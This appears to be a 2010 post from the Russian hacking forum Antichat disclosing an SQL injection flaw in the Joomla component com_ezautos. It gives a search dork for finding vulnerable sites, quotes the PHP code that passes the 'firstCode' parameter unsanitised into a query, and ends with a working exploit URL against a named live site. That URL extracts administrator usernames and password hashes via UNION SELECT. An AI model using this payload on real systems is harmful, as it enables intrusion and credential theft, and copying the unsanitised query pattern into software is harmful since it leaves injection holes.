12.03.2010, 01:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 178
С нами:
9731846
Репутация:
622
|
|
Уязвимость: SQL-Inj
Компонент: com_ezautos (проверял на v3.2.0)
Dopk: inurl:com_ezautos inurl: option
Файл: /components/com_ezautos/ezautos.php
PHP код:
switch ($task){
case 'helpers':
helpers($_REQUEST['id']);
break;
}
.......
function helpers($id){
global $database, $mainframe;
switch ($id) {
case '1':
if(isset($_GET['firstCode'])){
$query = "SELECT * FROM #__ezautos_model WHERE published='1' AND makeid=".$_GET['firstCode']." ORDER BY model DESC";
$database->setQuery( $query );
$rows = $database->loadObjectList();
echo "obj.options[obj.options.length] = new Option('Select Model','0');\n";
foreach ($rows as $row){
echo "obj.options[obj.options.length] = new Option('".$row->model."','".$row->moid."');\n";
}
}
break;
}
}
http://www.sfauto.ru/index.php?option=com_ezautos&Itemid=49&id=1&task=h elpers&firstCode=1+and+0+union+select+1,2,concat(u sername,0x3a,password),4,5,6,7+from+%23__users+whe re+gid=25+or+gid=24+and+block<>1-- |
|
|